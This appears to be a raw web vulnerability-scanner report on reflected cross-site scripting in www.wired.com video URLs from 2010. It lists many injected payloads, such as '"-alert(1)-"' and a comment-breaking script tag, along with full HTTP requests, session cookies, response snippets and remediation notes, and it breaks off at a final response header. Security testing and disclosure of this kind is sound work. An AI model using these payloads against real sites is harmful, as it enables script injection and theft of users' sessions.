HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:40:27 GMT Date: Mon, 22 Nov 2010 00:35:27 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106702
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videosee349"><a>f57f2580c56 c_latest"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 279cd"-alert(1)-"6a5aa6c2954 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos279cd"-alert(1)-"6a5aa6c2954/latest/1815816633/green-lantern-theatrical-trailer/680254055001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:41:13 GMT Date: Mon, 22 Nov 2010 00:36:13 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106762
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1ce3"><a>3ba2576a594 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos/latestb1ce3"><a>3ba2576a594/1815816633/green-lantern-theatrical-trailer/680254055001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:41:15 GMT Date: Mon, 22 Nov 2010 00:36:15 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106702
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos c_latestb1ce3"><a>3ba2576a594"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 21049"-alert(1)-"98b0f0a9714 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest21049"-alert(1)-"98b0f0a9714/1815816633/green-lantern-theatrical-trailer/680254055001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=298 Expires: Mon, 22 Nov 2010 00:42:04 GMT Date: Mon, 22 Nov 2010 00:37:06 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106716
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fdfee"-alert(1)-"dab3706a883 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633fdfee"-alert(1)-"dab3706a883/green-lantern-theatrical-trailer/680254055001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:42:16 GMT Date: Mon, 22 Nov 2010 00:37:16 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106749
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e01ee"-alert(1)-"5b4f05ec285 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633/green-lantern-theatrical-trailere01ee"-alert(1)-"5b4f05ec285/680254055001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:42:24 GMT Date: Mon, 22 Nov 2010 00:37:24 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106734
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4a0a0"-alert(1)-"b92fb7546c6 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633/green-lantern-theatrical-trailer/6802540550014a0a0"-alert(1)-"b92fb7546c6 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=273 Expires: Mon, 22 Nov 2010 00:42:08 GMT Date: Mon, 22 Nov 2010 00:37:35 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106779
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5536"><a>da764d97e81 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /videod5536"><a>da764d97e81/latest-videos/latest/1815816633/laserguided-rocket-launchers/660659848001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29423 Vary: Accept-Encoding Cache-Control: max-age=299 Expires: Mon, 22 Nov 2010 00:41:28 GMT Date: Mon, 22 Nov 2010 00:36:29 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_videod5536"><a>da764d97e81 ss_latest-videos c_latest"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 83275--><script>alert(1)</script>e5a9bbeecef was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /video83275--><script>alert(1)</script>e5a9bbeecef/latest-videos/latest/1815816633/laserguided-rocket-launchers/660659848001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29462 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:42:03 GMT Date: Mon, 22 Nov 2010 00:37:03 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /video83275--><script>alert(1)</script>e5a9bbeecef/latest-videos/latest/1815816633/laserguided-rocket-launchers/660659848001 --> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1d4e6"-alert(1)-"e33b8c1baf7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos1d4e6"-alert(1)-"e33b8c1baf7/latest/1815816633/laserguided-rocket-launchers/660659848001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=292 Expires: Mon, 22 Nov 2010 00:42:54 GMT Date: Mon, 22 Nov 2010 00:38:02 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106776
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9dcb"><a>1f630dc75e0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videosd9dcb"><a>1f630dc75e0/latest/1815816633/laserguided-rocket-launchers/660659848001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:42:10 GMT Date: Mon, 22 Nov 2010 00:37:10 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106698
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videosd9dcb"><a>1f630dc75e0 c_latest"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9d97"><a>f80f15bc3c8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos/latestc9d97"><a>f80f15bc3c8/1815816633/laserguided-rocket-launchers/660659848001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:43:11 GMT Date: Mon, 22 Nov 2010 00:38:11 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106769
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos c_latestc9d97"><a>f80f15bc3c8"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 94c99"-alert(1)-"457d603472f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest94c99"-alert(1)-"457d603472f/1815816633/laserguided-rocket-launchers/660659848001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:44:09 GMT Date: Mon, 22 Nov 2010 00:39:09 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106776
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a7996"-alert(1)-"f62a95a254e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633a7996"-alert(1)-"f62a95a254e/laserguided-rocket-launchers/660659848001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=287 Expires: Mon, 22 Nov 2010 00:44:08 GMT Date: Mon, 22 Nov 2010 00:39:21 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106684
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3825b"-alert(1)-"90b48e4dfef was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633/laserguided-rocket-launchers3825b"-alert(1)-"90b48e4dfef/660659848001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=291 Expires: Mon, 22 Nov 2010 00:44:25 GMT Date: Mon, 22 Nov 2010 00:39:34 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106775
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 73b55"-alert(1)-"8ee60d48302 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633/laserguided-rocket-launchers/66065984800173b55"-alert(1)-"8ee60d48302 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:44:42 GMT Date: Mon, 22 Nov 2010 00:39:42 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106730
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bea3f"><a>ee19a8d381a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /videobea3f"><a>ee19a8d381a/latest-videos/latest/1815816633/lockheed-shows-off-hulc-exoskeleton-at-asus/652164127001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29438 Vary: Accept-Encoding Cache-Control: max-age=288 Expires: Mon, 22 Nov 2010 00:46:45 GMT Date: Mon, 22 Nov 2010 00:41:57 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_videobea3f"><a>ee19a8d381a ss_latest-videos c_latest"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload ac914--><script>alert(1)</script>70f13a29eaf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /videoac914--><script>alert(1)</script>70f13a29eaf/latest-videos/latest/1815816633/lockheed-shows-off-hulc-exoskeleton-at-asus/652164127001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
